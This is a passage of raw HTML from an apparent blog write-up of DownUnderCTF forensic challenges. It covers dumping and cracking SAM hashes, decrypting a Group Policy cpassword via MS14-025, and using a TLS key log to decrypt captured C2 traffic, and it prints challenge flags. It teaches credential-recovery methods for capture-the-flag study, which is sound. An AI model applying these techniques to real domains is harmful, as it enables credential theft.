0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>SAM I AM(Forensic)</h2>\n<blockquote>\n<p>The attacker managed to gain Domain Admin on our rebels Domain Controller! Looks like they managed to log on with an account using WMI and dumped some files.</p>\n<p>Can you reproduce how they got the Administrator’s Password with the artifacts provided?</p>\n<p>Place the Administrator Account’s Password in DUCTF{}, e.g. DUCTF{password123!}</p>\n</blockquote>\n<p>As the title suggests, this was a SAM hash cracking challenge.</p>\n<p>I dumped the hashes with impacket.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 901px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6feec35a4b282078a98ad731485af706/0955e/image-20240707103615602.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 20.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAyElEQVQY01WP2RKCMAxFgRYfYEZWpSxF2dwAQf3/b7umVRh9uJPTTOckMRKRQKQCgmq8i7FP9sjzDFmWoihyZMSq53lbhFGIMAzg+R6CwAdjDIZh/CeiT2UpSSiQkkQSFzLXsmN1pBzQtg2quoKUBdQCSmiaphYuUW8tvN4ueL4emB8zhrFHP/TEE9UbpnnCeB8036cR58sJ3alF3dRoaEjbNZrVdY7jfDeMo/Uc13VhWRY45zqMWev0pW9vbDDOwG1i+8O/J78B9iFiMfOa6gsAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6feec35a4b282078a98ad731485af706/8ac56/image-20240707103615602.webp 240w,\n/static/6feec35a4b282078a98ad731485af706/d3be9/image-20240707103615602.webp 480w,\n/static/6feec35a4b282078a98ad731485af706/2b666/image-20240707103615602.webp 901w\"\n              sizes=\"(max-width: 901px) 100vw, 901px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6feec35a4b282078a98ad731485af706/8ff5a/image-20240707103615602.png 240w,\n/static/6feec35a4b282078a98ad731485af706/e85cb/image-20240707103615602.png 480w,\n/static/6feec35a4b282078a98ad731485af706/0955e/image-20240707103615602.png 901w\"\n            sizes=\"(max-width: 901px) 100vw, 901px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6feec35a4b282078a98ad731485af706/0955e/image-20240707103615602.png\"\n            alt=\"image-20240707103615602\"\n            title=\"image-20240707103615602\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>By cracking them with Hashcat, I identified <code class=\"language-text\">DUCTF{!checkerboard1}</code> as the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 733px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/19e5146ec5b533c5ed3afe16a70f9290/00b70/image-20240707104045294.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 47.08333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABN0lEQVQoz32Sy46CQBBFWYIiBkQTAQlPNRgFRZCF/P9n1eRUgomOM4tONdWpW/eBcT6fJUkScRxHlsulbLdbaZpGwjAUy7J+nfl8LrZtv+rnMRgGNI5jWSwWWh+Ph9zvd8myTIHpcXa7nXie9y+ocblcpK5rBdhsNhIEgZxOJymKQqqq0jeWtm2rdb/fi2maX9mxwLherwIoAzCIokiBAE3TVBlOfe7U1WqlarBgNpu9WWEAdLvdJM9z9ZEhwOjxhlSAAcVr7liB177vy3q91sMCZdh1nQ7SJBQA+e77Xm3gffIZuSw4HA669Hg8qhrI0FeGwzDoAA3XdZXJ8/mUcRwVjDsDeIqCb8m/SYbJFAqDAOIrkkkbZsiECZJRAPCfoZRl+UoVw0kaacgCgNTp49nnr/Ltt/kBJ9bvLB3w6cwAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/19e5146ec5b533c5ed3afe16a70f9290/8ac56/image-20240707104045294.webp 240w,\n/static/19e5146ec5b533c5ed3afe16a70f9290/d3be9/image-20240707104045294.webp 480w,\n/static/19e5146ec5b533c5ed3afe16a70f9290/cf734/image-20240707104045294.webp 733w\"\n              sizes=\"(max-width: 733px) 100vw, 733px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/19e5146ec5b533c5ed3afe16a70f9290/8ff5a/image-20240707104045294.png 240w,\n/static/19e5146ec5b533c5ed3afe16a70f9290/e85cb/image-20240707104045294.png 480w,\n/static/19e5146ec5b533c5ed3afe16a70f9290/00b70/image-20240707104045294.png 733w\"\n            sizes=\"(max-width: 733px) 100vw, 733px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/19e5146ec5b533c5ed3afe16a70f9290/00b70/image-20240707104045294.png\"\n            alt=\"image-20240707104045294\"\n            title=\"image-20240707104045294\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"bad-policiesforensic\" style=\"position:relative;\"><a href=\"#bad-policiesforensic\" aria-label=\"bad policiesforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Bad Policies(Forensic)</h2>\n<blockquote>\n<p>Looks like the attacker managed to access the rebels Domain Controller.</p>\n<p>Can you figure out how they got access after pulling these artifacts from one of our Outpost machines?</p>\n</blockquote>\n<p>The challenge provides dumped Group Policy settings and similar artifacts.</p>\n<p>I used Registry.Pol Viewer and reviewed the <code class=\"language-text\">.pol</code> contents, but I couldn’t find anything suspicious.</p>\n<p>Reference: <a href=\"https://sdmsoftware.com/389932-gpo-freeware-downloads/registry-pol-viewer-utility/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Registry.Pol Viewer Utility - SDM Software</a></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 815px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/da83fb37e5467e8c6070569ee3d7031c/ef916/image-20240707104630760.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 40%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABRklEQVQoz5WS2XKDMAxF+f8fS1/CHgoBAgEmlLBnWEIKuZWc0kmXl3rmjGVblq5kS1VVo+86DMOIaZpwvV4xkj2OI5Zlwf1+/xdSmqY4Ho/IzmdcLhe0bSvm1X6maZpf9vMeI0VRBNfzkOf5lwNT17VgXTOPJM92++0OIzmOgziOURQFzqSSAzNVVaEsS7HPcCWu6+F0OtE6x+FwQJIkiKMYWZYJH74nqaoKVdVgGAZ0XYdpmjQbj6B1Rb0dMN1uQu1m84IgDNFRz1VFJSEJ9iTI9wPM87vov6RRMFlWoMgyttstFHLUNB171yVFLoIgoGANJnL2PR9vpKbr+s+kBUpSxuc8xKNwhtdXG45tw7YdWJaFMIxEb1gVvzyPoe+x21kwCS6Pk4VBiMD3qQ2p8OFfIf319Ms840ZlMuvX4XllpvOfeysf0Hlbew3x+UIAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/da83fb37e5467e8c6070569ee3d7031c/8ac56/image-20240707104630760.webp 240w,\n/static/da83fb37e5467e8c6070569ee3d7031c/d3be9/image-20240707104630760.webp 480w,\n/static/da83fb37e5467e8c6070569ee3d7031c/0ea8f/image-20240707104630760.webp 815w\"\n              sizes=\"(max-width: 815px) 100vw, 815px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/da83fb37e5467e8c6070569ee3d7031c/8ff5a/image-20240707104630760.png 240w,\n/static/da83fb37e5467e8c6070569ee3d7031c/e85cb/image-20240707104630760.png 480w,\n/static/da83fb37e5467e8c6070569ee3d7031c/ef916/image-20240707104630760.png 815w\"\n            sizes=\"(max-width: 815px) 100vw, 815px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/da83fb37e5467e8c6070569ee3d7031c/ef916/image-20240707104630760.png\"\n            alt=\"image-20240707104630760\"\n            title=\"image-20240707104630760\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>However, I noticed that <code class=\"language-text\">cpassword</code> was embedded in <code class=\"language-text\">Groups.xml</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f143d56eee88b8ca99cbb48f4f76940a/9239a/image-20240707110942775.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 10.833333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAWUlEQVQI133LOw6AIBREUfYhRpj3ARpjpHD/KxsJUluc3GkmuBded6eaMwMUVUKEmNuInChDTgf3uA3xVwC+s5U21NVGr41nf1jd2EwGZVFMVWUqExahC/gCi2E4W371nIcAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f143d56eee88b8ca99cbb48f4f76940a/8ac56/image-20240707110942775.webp 240w,\n/static/f143d56eee88b8ca99cbb48f4f76940a/d3be9/image-20240707110942775.webp 480w,\n/static/f143d56eee88b8ca99cbb48f4f76940a/e46b2/image-20240707110942775.webp 960w,\n/static/f143d56eee88b8ca99cbb48f4f76940a/0d9bd/image-20240707110942775.webp 1246w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f143d56eee88b8ca99cbb48f4f76940a/8ff5a/image-20240707110942775.png 240w,\n/static/f143d56eee88b8ca99cbb48f4f76940a/e85cb/image-20240707110942775.png 480w,\n/static/f143d56eee88b8ca99cbb48f4f76940a/d9199/image-20240707110942775.png 960w,\n/static/f143d56eee88b8ca99cbb48f4f76940a/9239a/image-20240707110942775.png 1246w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f143d56eee88b8ca99cbb48f4f76940a/d9199/image-20240707110942775.png\"\n            alt=\"image-20240707110942775\"\n            title=\"image-20240707110942775\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>A currently known vulnerability allows <code class=\"language-text\">cpassword</code> to be cracked.</p>\n<p>Reference: <a href=\"https://support.microsoft.com/ja-jp/topic/-ms14-025-%E3%82%B0%E3%83%AB%E3%83%BC%E3%83%97-%E3%83%9D%E3%83%AA%E3%82%B7%E3%83%BC%E5%9F%BA%E6%9C%AC%E8%A8%AD%E5%AE%9A%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AB%E3%82%88%E3%82%8A-%E7%89%B9%E6%A8%A9%E3%81%8C%E6%98%87%E6%A0%BC%E3%81%95%E3%82%8C%E3%82%8B-2014-%E5%B9%B4-5-%E6%9C%88-13-%E6%97%A5-60734e15-af79-26ca-ea53-8cd617073c30\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">[MS14-025] A vulnerability in Group Policy Preferences could allow elevation of privilege (May 13, 2014) - Microsoft Support</a></p>\n<p>So I used the following cracking tool to recover the password from <code class=\"language-text\">cpassword</code>, which let me identify the correct flag.</p>\n<p>Reference: <a href=\"https://github.com/t0thkr1s/gpp-decrypt\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">GitHub - t0thkr1s/gpp-decrypt: Tool to parse the Group Policy Preferences XML file which extracts the username and decrypts the cpassword attribute.</a></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7423dfe6403ba06e42db55a8ae416587/5f7fb/image-20240707110911021.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 10.833333333333334%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAVUlEQVQI15XLQQ7AIAgEQNoIAjbGRk3//9Iteui9hwlsFqiNgjYq7j7R54OrNnA2iBWoO1R1ExG4W/DNLPbiX17duiORDGYGpxQzxSNHkbfzPEBEv7zJSyruftMaXgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7423dfe6403ba06e42db55a8ae416587/8ac56/image-20240707110911021.webp 240w,\n/static/7423dfe6403ba06e42db55a8ae416587/d3be9/image-20240707110911021.webp 480w,\n/static/7423dfe6403ba06e42db55a8ae416587/e46b2/image-20240707110911021.webp 960w,\n/static/7423dfe6403ba06e42db55a8ae416587/f992d/image-20240707110911021.webp 1440w,\n/static/7423dfe6403ba06e42db55a8ae416587/4902d/image-20240707110911021.webp 1889w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7423dfe6403ba06e42db55a8ae416587/8ff5a/image-20240707110911021.png 240w,\n/static/7423dfe6403ba06e42db55a8ae416587/e85cb/image-20240707110911021.png 480w,\n/static/7423dfe6403ba06e42db55a8ae416587/d9199/image-20240707110911021.png 960w,\n/static/7423dfe6403ba06e42db55a8ae416587/07a9c/image-20240707110911021.png 1440w,\n/static/7423dfe6403ba06e42db55a8ae416587/5f7fb/image-20240707110911021.png 1889w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7423dfe6403ba06e42db55a8ae416587/d9199/image-20240707110911021.png\"\n            alt=\"image-20240707110911021\"\n            title=\"image-20240707110911021\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"emuc2forensic\" style=\"position:relative;\"><a href=\"#emuc2forensic\" aria-label=\"emuc2forensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>emuc2(Forensic)</h2>\n<blockquote>\n<p>As all good nation states, we have our own malware and C2 for offensive operations. But someone has got the source code and is using it against us! Here’s a capture of traffic we found on one of our laptops…</p>\n</blockquote>\n<p>The challenge provides the following key log file and pcap as artifacts.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">SERVER_HANDSHAKE_TRAFFIC_SECRET 96c6bfed6964bf670d10173aeace529145757694708aa9eb6cf66adddd11843a 1bfc9a265e4ecfc52c64405ec2364a75bcb391c05d2da07fea71aa378dc6f1a4\nEXPORTER_SECRET 96c6bfed6964bf670d10173aeace529145757694708aa9eb6cf66adddd11843a c4728fd867102154b3797992d8517769fd2930c1322c19e05587c1d0323d1094\nSERVER_TRAFFIC_SECRET_0 96c6bfed6964bf670d10173aeace529145757694708aa9eb6cf66adddd11843a 31b5fa2f3b7129505d312a2a3ecf8fabc0e84f450bd4e7a79b9a423849b2b47a\nCLIENT_HANDSHAKE_TRAFFIC_SECRET 96c6bfed6964bf670d10173aeace529145757694708aa9eb6cf66adddd11843a ddb7df3d1a327bfba9b9e060baedbc1f3e9edfb5deaec8177adc94ea6c778043\nCLIENT_TRAFFIC_SECRET_0 96c6bfed6964bf670d10173aeace529145757694708aa9eb6cf66adddd11843a 48e788cf9dde473ce9f326aa272b4784bad59c645da5fe91e0c09a9922cdb767\nSERVER_HANDSHAKE_TRAFFIC_SECRET 6584a37b45e90e7a9f14c89eddb16f75f1c75ef5af262dce780202311b12dafa 2cbc2292df70c2e36fcae22de273d76024c770fc5b46d852adb860313dabcf99\nEXPORTER_SECRET 6584a37b45e90e7a9f14c89eddb16f75f1c75ef5af262dce780202311b12dafa af842c754fe7f0109983a0705e85af1051fadbfa962fedc84c7c6cb17fd109f4\nSERVER_TRAFFIC_SECRET_0 6584a37b45e90e7a9f14c89eddb16f75f1c75ef5af262dce780202311b12dafa fcb56de1d6c17cca7791807b03cf662e3730e9f9143fd8327ec4bc7517995f77\nCLIENT_HANDSHAKE_TRAFFIC_SECRET 6584a37b45e90e7a9f14c89eddb16f75f1c75ef5af262dce780202311b12dafa 10442cc2c1f110bdce7c58a37a89b6d8775c077d601f1ae782d1552cb16cda47\nCLIENT_TRAFFIC_SECRET_0 6584a37b45e90e7a9f14c89eddb16f75f1c75ef5af262dce780202311b12dafa d9bd97f3b6d6632f367878cdd8b0ff38d8590fcb9ebee42fa9954331bb8d4c42\nSERVER_HANDSHAKE_TRAFFIC_SECRET 653a112cd0bd681fd9803186918028b40d1d914cd2b5b6b87b3d7daf4f4948cf d5771d32ad0b1422eb3335414349835a98e875874cec846d1e8737d8e1583d59\nEXPORTER_SECRET 653a112cd0bd681fd9803186918028b40d1d914cd2b5b6b87b3d7daf4f4948cf 83a0fffcd8e4795932adf8c6ae8e1aebc02c1b373d218164e0b92605ea47fd64\nSERVER_TRAFFIC_SECRET_0 653a112cd0bd681fd9803186918028b40d1d914cd2b5b6b87b3d7daf4f4948cf 00e2ca1b2581d8fd93b5c88e6a5fccb45f7e166b91c3660c9324c4ac2d317c2d\nCLIENT_HANDSHAKE_TRAFFIC_SECRET 653a112cd0bd681fd9803186918028b40d1d914cd2b5b6b87b3d7daf4f4948cf c26cbaa800392054e5f99320da96d7d45d3217f5bf579dd98d9fbf134797e33a\nCLIENT_TRAFFIC_SECRET_0 653a112cd0bd681fd9803186918028b40d1d914cd2b5b6b87b3d7daf4f4948cf 41f038a84afa86698bdcb315d3e4bbec97f97d3fb21c18ee90ff3ec8fec4fa1c\nSERVER_HANDSHAKE_TRAFFIC_SECRET c99c34eedc9d76a76c8d114d8c199831901dfb423644bcb05fb2bdc7e0d99061 e57fac6e9ee5679b5cc73caa8e03fac485b9b8c52b8d0230a29b3e47620df925\nEXPORTER_SECRET c99c34eedc9d76a76c8d114d8c199831901dfb423644bcb05fb2bdc7e0d99061 8280482a484454c4924299d37dfeb00d6a4244056fa4117126e3848b320df11e\nSERVER_TRAFFIC_SECRET_0 c99c34eedc9d76a76c8d114d8c199831901dfb423644bcb05fb2bdc7e0d99061 d66450efcfaa5d296ee1ec40077ce5e362fb359c4ba62625ffa558f6f90b7fdb\nCLIENT_HANDSHAKE_TRAFFIC_SECRET c99c34eedc9d76a76c8d114d8c199831901dfb423644bcb05fb2bdc7e0d99061 39505a4dbda2a26f892bacc83cbd72c62e2e20496c8716246047b3b2f1e57321\nCLIENT_TRAFFIC_SECRET_0 c99c34eedc9d76a76c8d114d8c199831901dfb423644bcb05fb2bdc7e0d99061 b2f4e1750aaee0b5a948f5c186db239df53b9869f0c3922c70a9e84e983d6b7a</code></pre></div>\n<p>For now, I set this key log file in Wireshark as a TLS master secret log.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 699px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9171f810cb3672e9f2443fbe9b4f7eec/3fe45/image-20240707144447987.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 84.16666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAAAsTAAALEwEAmpwYAAACLElEQVQ4y6VU246iUBD0wWj0zWRfBLwLqAgiKKLgBWVQk/Er5v+/oba7R4yXdWeTfagcOM2pru7qQ+GX0oWq1FGvK1BVFdVqFaVSSVAsFlEul1GpVP4JtVoNhX6vi2S/x3q9hmVZmM/nCMNQkCQJ7Y3QaDTQarX+imazKWvBNE2k6QfCxQKTiQvP84R0Qe97SuTYtihn0nsoigLlaV8IDSJMkj1WqxURTmAYBlzXlZU/6Ha76PV6N/C7eT2zXIbyzQOhqRs4UHAxD0iNg95kAIeIbVLGCRiO42A6ncrKyYbDIUYjS1Yu9YFQHw+wO6eI0g2mcw/6nPoYBPCIIKAks9lM4Hk+/Gs7mJTV1ut1IcxJhbCZ2fC/MrhfBzjZAoY9RED9866KvpW6QiKKHVI/HkvpjBeFXPIHmZJsd6TAhzO2MfN9OuhgTM9Mquv6jSBH3s8XQm5+lmXkdCqjYhimGMRjtKUkm81GHOdSuXS93xdTjscj1nH8aoph6DidTrhcLnTAl4CmaQ/IZ+x+3lhdp9P5s0KeQ1biupPboXs8z+AzHkxh+bvdDlEUSWl58Jn0JzwoPBxSnKnsgMblfwjb7XZecirqeCx48x3hT4luJX9+XnA+n8XF3LV3hzRVg0p/Jo3usXoFG8d3m+MFnrPlcok4jmSIOfiu+RzrD3RYngPDGsCi68d/KBbFPLwWclfzpvIovEO71cZ4NkGUbeGGPuIoJkO3covYWL7vvwFLyurBznAR7AAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9171f810cb3672e9f2443fbe9b4f7eec/8ac56/image-20240707144447987.webp 240w,\n/static/9171f810cb3672e9f2443fbe9b4f7eec/d3be9/image-20240707144447987.webp 480w,\n/static/9171f810cb3672e9f2443fbe9b4f7eec/32d5d/image-20240707144447987.webp 699w\"\n              sizes=\"(max-width: 699px) 100vw, 699px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9171f810cb3672e9f2443fbe9b4f7eec/8ff5a/image-20240707144447987.png 240w,\n/static/9171f810cb3672e9f2443fbe9b4f7eec/e85cb/image-20240707144447987.png 480w,\n/static/9171f810cb3672e9f2443fbe9b4f7eec/3fe45/image-20240707144447987.png 699w\"\n            sizes=\"(max-width: 699px) 100vw, 699px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9171f810cb3672e9f2443fbe9b4f7eec/3fe45/image-20240707144447987.png\"\n            alt=\"image-20240707144447987\"\n            title=\"image-20240707144447987\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>This lets us decrypt the TLS packets, so I started looking through the contents.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/a61597b62fdc557ad211094a2f7dfc7d/91608/image-20240707134524815.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 21.666666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA5UlEQVQY01XNTU7CQACG4Z5l2qDlDBg7tDSEBW2HAKluVdgUtUgbTXSlMdGlB/CHhamYeBG3brzM67Q0RBZPvndmFmPsyy57LYllWZimiaWZQlQtxFrZ/23uxXaXjNlpxt39E5PpGUcnCceTWSWMRkRqpHdMEA4Jw/KsOxiiBjFSejR2GtjNJru2vWEUyy9+vn95fy4oXlcULx+s3j55uH0k1Z/Ntcs04ybPuM60xUJ3XvVVmpKfX+j3OXmSEPR6GF1XMg76xCricKA4qDdWCt916UiJ325X7Xslr7Z+6ziOXqdeyR+TwJuDCc+B4gAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/a61597b62fdc557ad211094a2f7dfc7d/8ac56/image-20240707134524815.webp 240w,\n/static/a61597b62fdc557ad211094a2f7dfc7d/d3be9/image-20240707134524815.webp 480w,\n/static/a61597b62fdc557ad211094a2f7dfc7d/e46b2/image-20240707134524815.webp 960w,\n/static/a61597b62fdc557ad211094a2f7dfc7d/e4396/image-20240707134524815.webp 1251w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/a61597b62fdc557ad211094a2f7dfc7d/8ff5a/image-20240707134524815.png 240w,\n/static/a61597b62fdc557ad211094a2f7dfc7d/e85cb/image-20240707134524815.png 480w,\n/static/a61597b62fdc557ad211094a2f7dfc7d/d9199/image-20240707134524815.png 960w,\n/static/a61597b62fdc557ad211094a2f7dfc7d/91608/image-20240707134524815.png 1251w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/a61597b62fdc557ad211094a2f7dfc7d/d9199/image-20240707134524815.png\"\n            alt=\"image-20240707134524815\"\n            title=\"image-20240707134524815\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/3a1e5fbd1395573319009d672e5c0723/bc3ae/image-20240707135209625.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 28.750000000000004%; position: relative; bottom: 0; left: 0; background-image: 